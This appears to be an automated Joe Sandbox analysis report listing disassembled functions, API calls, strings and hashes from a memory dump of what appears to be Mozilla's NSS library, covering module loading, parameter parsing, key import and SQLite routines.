strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C71779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7177AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6C7177C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C7177DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6C717821
PORT_Alloc_Util.NSS3(?), ref: 6C717837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C71785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C71786F
SECMOD_AddNewModuleEx.NSS3 ref: 6C7178AC
free.MOZGLUE(00000000), ref: 6C7178BE
SECMOD_AddNewModuleEx.NSS3 ref: 6C7178F3
free.MOZGLUE(00000000), ref: 6C7178FC
free.MOZGLUE(00000000), ref: 6C71791C

Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07AD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07CD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07D6
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C68204A), ref: 6C6F07E4
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,6C68204A), ref: 6C6F0864
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6F0880
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C68204A), ref: 6C6F08CB
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08D7
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08FB

Strings

name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C7174C7
extern:, xrefs: 6C71772B
rdb:, xrefs: 6C717744
,defaultModDB,internalKeySlot, xrefs: 6C71748D, 6C7174AA
dll, xrefs: 6C71788E
NSS Internal Module, xrefs: 6C7174A2, 6C7174C6
dbm:, xrefs: 6C717716
kbi., xrefs: 6C717886
sql:, xrefs: 6C7176FE
Spac, xrefs: 6C717389

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: bbc334081df02e52dbf16753eccaa9013cdab5137ff73cee88fd968227d74c87
Instruction ID: 39851e65f7d753728c7c6d71ce2fd251547e876fe6fabfe47d359c00a9b93584
Opcode Fuzzy Hash: bbc334081df02e52dbf16753eccaa9013cdab5137ff73cee88fd968227d74c87
Instruction Fuzzy Hash: 2C52F4B1E092059BEF218F65CE097AA7BB4AF0A30CF184538EC09A7E41E775D954CBD1

Function 6C7509B0 Relevance: 66.8, APIs: 44, Instructions: 817memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C751AD3), ref: 6C7509D5
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C751AD3), ref: 6C7509E9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C750A18
PR_SetError.NSS3(00000000,00000000), ref: 6C750A30
memcpy.VCRUNTIME140(?,00000000,00000020,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C750CC9
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C750D05
EnterCriticalSection.KERNEL32(?), ref: 6C750D19
PR_Unlock.NSS3(?), ref: 6C750D36
free.MOZGLUE(?), ref: 6C750D75
TlsGetValue.KERNEL32 ref: 6C750DA1
EnterCriticalSection.KERNEL32(?), ref: 6C750DB5
PR_Unlock.NSS3(?), ref: 6C750DEB
PORT_Alloc_Util.NSS3(?), ref: 6C750DFF
PR_Unlock.NSS3(?), ref: 6C750E37
free.MOZGLUE(?), ref: 6C750E4E
PR_SetError.NSS3(00000000,00000000), ref: 6C750E6A
memset.VCRUNTIME140(?,00000000,00000100), ref: 6C750E9A
TlsGetValue.KERNEL32 ref: 6C750F23
EnterCriticalSection.KERNEL32(?), ref: 6C750F37
PR_SetError.NSS3(00000000,00000000), ref: 6C750FC7

Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF

PR_Unlock.NSS3(?), ref: 6C750FDE
TlsGetValue.KERNEL32 ref: 6C750FFA
EnterCriticalSection.KERNEL32(?), ref: 6C75100E
PR_Unlock.NSS3(?), ref: 6C751050
PR_Unlock.NSS3(?), ref: 6C751073
TlsGetValue.KERNEL32 ref: 6C751087
EnterCriticalSection.KERNEL32(?), ref: 6C75109B
PR_Unlock.NSS3(?), ref: 6C7510B8
free.MOZGLUE(?), ref: 6C751113
PORT_Alloc_Util.NSS3(?), ref: 6C751151
free.MOZGLUE(?), ref: 6C7511AB
TlsGetValue.KERNEL32 ref: 6C751296
EnterCriticalSection.KERNEL32(?), ref: 6C7512AB
PR_Unlock.NSS3(?), ref: 6C7512D9
TlsGetValue.KERNEL32 ref: 6C7512F4
EnterCriticalSection.KERNEL32(?), ref: 6C75130C
PR_Unlock.NSS3(?), ref: 6C751340
TlsGetValue.KERNEL32 ref: 6C751354
EnterCriticalSection.KERNEL32(?), ref: 6C75136C
PR_Unlock.NSS3(?), ref: 6C7513A3
TlsGetValue.KERNEL32 ref: 6C7513BA
EnterCriticalSection.KERNEL32(?), ref: 6C7513CF
PR_Unlock.NSS3(?), ref: 6C7513FB

Part of subcall function 6C7ADD70: TlsGetValue.KERNEL32 ref: 6C7ADD8C
Part of subcall function 6C7ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4

PR_SetError.NSS3(FFFFE040,00000000), ref: 6C75141E

Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07AD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07CD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07D6
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C68204A), ref: 6C6F07E4
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,6C68204A), ref: 6C6F0864
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6F0880
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C68204A), ref: 6C6F08CB
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08D7
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08FB

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalSection$Enter$Errorfree$Alloc_Utilcalloc$Leavememcpymemset
String ID:
API String ID: 3136013483-0
Opcode ID: cba4d84a42e34570d5cb8b99d22aeb28effe5856f070d300581e6b3db94bba23
Instruction ID: fb6b280bd09399934bf64611cfca6b0034b15508beaa1b3fdc99978103f3c9d5
Opcode Fuzzy Hash: cba4d84a42e34570d5cb8b99d22aeb28effe5856f070d300581e6b3db94bba23
Instruction Fuzzy Hash: 5172BEB1D002549FEB519F24C9887EA3BB4BF0631CF5811B9DC099B752EB34A8A5CB91

Function 6C764840 Relevance: 63.4, APIs: 29, Strings: 7, Instructions: 351memorystringCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6C74601B,?,00000000,?), ref: 6C76486F
PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6C7648A8
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6C7648BE
NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6C7648DE
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6C7648F5
NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6C76490A
PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6C764919
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6C76493F
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C764970
PORT_Alloc_Util.NSS3(00000001), ref: 6C7649A0
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C7649AD
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7649D4
NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6C7649F4
NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6C764A10
NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6C764A27
NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6C764A3D
NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6C764A4F
PL_strcasecmp.NSS3(00000000,every), ref: 6C764A6C
PL_strcasecmp.NSS3(00000000,timeout), ref: 6C764A81
free.MOZGLUE(00000000), ref: 6C764AAB
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C764ABE
PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6C764ADC
free.MOZGLUE(00000000), ref: 6C764B17
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C764B33

Part of subcall function 6C764120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C76413D
Part of subcall function 6C764120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C764162
Part of subcall function 6C764120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C76416B
Part of subcall function 6C764120: PL_strncasecmp.NSS3(2Bvl,?,00000001), ref: 6C764187
Part of subcall function 6C764120: NSSUTIL_ArgSkipParameter.NSS3(2Bvl), ref: 6C7641A0
Part of subcall function 6C764120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7641B4
Part of subcall function 6C764120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6C7641CC
Part of subcall function 6C764120: NSSUTIL_ArgFetchValue.NSS3(2Bvl,?), ref: 6C764203

PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6C764B53
free.MOZGLUE(00000000), ref: 6C764B94
free.MOZGLUE(?), ref: 6C764BA7
free.MOZGLUE(00000000), ref: 6C764BB7
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C764BC8

Strings

rootFlags, xrefs: 6C764AB9, 6C764B2E
hasRootTrust, xrefs: 6C764B4D
every, xrefs: 6C764A66
slotFlags, xrefs: 6C764A22
hasRootCerts, xrefs: 6C764AD6
timeout, xrefs: 6C764A38, 6C764A7B
askpw, xrefs: 6C764A4A

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
API String ID: 3791087267-1256704202
Opcode ID: 48b1d877db36f754aee0ec65c6044456d04e58f5efbfbc42f06c13d04d8b7ccf
Instruction ID: 920fc2ffb01c705a4bd4dbddcdde72803d6917b66961ade84a72f3b3d85026b3
Opcode Fuzzy Hash: 48b1d877db36f754aee0ec65c6044456d04e58f5efbfbc42f06c13d04d8b7ccf
Instruction Fuzzy Hash: 9FC12970E452559FDB10CFBADE647AA7BB8AF0634CF140435EC49A3F01E7259904DBA1

Function 6C726D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6C82A8EC,0000006C), ref: 6C726DC6
memcpy.VCRUNTIME140(?,6C82A958,0000006C), ref: 6C726DDB
memcpy.VCRUNTIME140(?,6C82A9C4,00000078), ref: 6C726DF1
memcpy.VCRUNTIME140(?,6C82AA3C,0000006C), ref: 6C726E06
memcpy.VCRUNTIME140(?,6C82AAA8,00000060), ref: 6C726E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C726E38

Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6C726E76
TlsGetValue.KERNEL32 ref: 6C72726F
EnterCriticalSection.KERNEL32(?), ref: 6C727283

Strings

!, xrefs: 6C727123

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: 72e58256691988ec191dba9f1a498a18e636138d959090808b27effc78906038
Instruction ID: 512dfa35c74aac523b0f8e05f6ecf2b25de75e24c052738aa3887085aa7674c5
Opcode Fuzzy Hash: 72e58256691988ec191dba9f1a498a18e636138d959090808b27effc78906038
Instruction Fuzzy Hash: 14729E75D052199FDF60DF28CE8879ABBB5BF49308F1041A9D80DA7701E735AA84CF91

Function 6C693C40 Relevance: 41.2, APIs: 20, Strings: 3, Instructions: 932COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C693C66
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C693D04
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C693EAD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C693ED7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C693F74
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C694052
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C69406F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C69410D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C69449C

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C694452, 6C694486, 6C6944EA, 6C694571, 6C694580, 6C69458F, 6C69475A, 6C6947FA
database corruption, xrefs: 6C694490, 6C6944F4, 6C694599, 6C694764, 6C694804
%s at line %d of [%.10s], xrefs: 6C694495, 6C6944F9, 6C69459E, 6C694769, 6C694809

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2597148001-598938438
Opcode ID: fd6264f304fed0cc181648888009fb879ea4f2e7e773bf4fc68aefcb84edd768
Instruction ID: a9a402608669e1d18b036967d9abc49cabc4360a092cf84a5ac606fc4cd724fc
Opcode Fuzzy Hash: fd6264f304fed0cc181648888009fb879ea4f2e7e773bf4fc68aefcb84edd768
Instruction Fuzzy Hash: 5482CE74A00216CFCB04CF68C580BAE77F2BF49318F2585A9D819ABB51D771EC42CB99

Function 6C76AC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C76ACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C76ACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C76ACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C76AD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C76ADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C76ADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C76ADF0

Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C76B06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C76B08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C76B1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C76B27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6C76B2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C76B3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C76B40C

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: cb9d836e7ecd754af6800884d11e341e4560ceef922c4ac3db569a5553e7042c
Instruction ID: 250d78fb0ec3e64a52858d7eac80d8ee4f4925fccf4b274cea8a870830caa2a2
Opcode Fuzzy Hash: cb9d836e7ecd754af6800884d11e341e4560ceef922c4ac3db569a5553e7042c
Instruction Fuzzy Hash: D822CF70904300AFE710CF16CE48B9A77E1AF85308F248538FC585BB92E772E859DB92

Function 6C6EECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C6EED38

Part of subcall function 6C684F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C684FC4

sqlite3_mprintf.NSS3(snippet), ref: 6C6EEF3C
sqlite3_mprintf.NSS3(offsets), ref: 6C6EEFE4

Part of subcall function 6C7ADFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C685001,?,00000003,00000000), ref: 6C7ADFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6C6EF087
sqlite3_mprintf.NSS3(matchinfo), ref: 6C6EF129
sqlite3_mprintf.NSS3(optimize), ref: 6C6EF1D1
sqlite3_free.NSS3(?), ref: 6C6EF368

Strings

fts3_tokenizer, xrefs: 6C6EEE1A, 6C6EEEA8
fts4, xrefs: 6C6EF2AD
fts3, xrefs: 6C6EF247
fts3tokenize, xrefs: 6C6EF30F
optimize, xrefs: 6C6EF199, 6C6EF1CC, 6C6EF211
unicode61, xrefs: 6C6EEDB5
porter, xrefs: 6C6EED97
matchinfo, xrefs: 6C6EF04F, 6C6EF082, 6C6EF0C2, 6C6EF0F2, 6C6EF124, 6C6EF169
fts4aux, xrefs: 6C6EECF9
simple, xrefs: 6C6EED79
offsets, xrefs: 6C6EEFAF, 6C6EEFDF, 6C6EF01F
snippet, xrefs: 6C6EEF05, 6C6EEF37, 6C6EEF7C

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: c43646a26ee29714a5b1b3719b35976759337c2ce77c2f8b3630693b2aed5342
Instruction ID: 3219a15f376c46de6b1fa55d4cf5b63479c828e79f613a4be3406a5acf56e809
Opcode Fuzzy Hash: c43646a26ee29714a5b1b3719b35976759337c2ce77c2f8b3630693b2aed5342
Instruction Fuzzy Hash: 7202EFB1B093004BE7149E71A88532B36B17BCA70CF14493ED95A87B41EB79E84AC7D7

Function 6C767C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C767C33
NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C767C66
CERT_DestroyCertificate.NSS3(00000000), ref: 6C767D1E

Part of subcall function 6C767870: SECOID_FindOID_Util.NSS3(?,?,?,6C7691C5), ref: 6C76788F

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C767D48
PR_SetError.NSS3(FFFFE067,00000000), ref: 6C767D71
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C767DD3
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C767DE1
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C767DF8
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C767E1A
PR_SetError.NSS3(FFFFE067,00000000), ref: 6C767E58

Part of subcall function 6C767870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7691C5), ref: 6C7678BB
Part of subcall function 6C767870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C7691C5), ref: 6C7678FA
Part of subcall function 6C767870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C7691C5), ref: 6C767930
Part of subcall function 6C767870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7691C5), ref: 6C767951
Part of subcall function 6C767870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C767964
Part of subcall function 6C767870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C76797A
Part of subcall function 6C767870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C767988
Part of subcall function 6C767870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C767998
Part of subcall function 6C767870: free.MOZGLUE(00000000), ref: 6C7679A7
Part of subcall function 6C767870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C7691C5), ref: 6C7679BB
Part of subcall function 6C767870: PR_GetCurrentThread.NSS3(?,?,?,?,6C7691C5), ref: 6C7679CA

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C767E49
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C767F8C
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C767F98
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C767FBF
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C767FD9
PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6C768038
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C768050
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C768093
SECOID_FindOID_Util.NSS3 ref: 6C767F29

Part of subcall function 6C7607B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C708298,?,?,?,6C6FFCE5,?), ref: 6C7607BF
Part of subcall function 6C7607B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7607E6
Part of subcall function 6C7607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C76081B
Part of subcall function 6C7607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C760825

SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C768072
SECOID_FindOID_Util.NSS3 ref: 6C7680F5

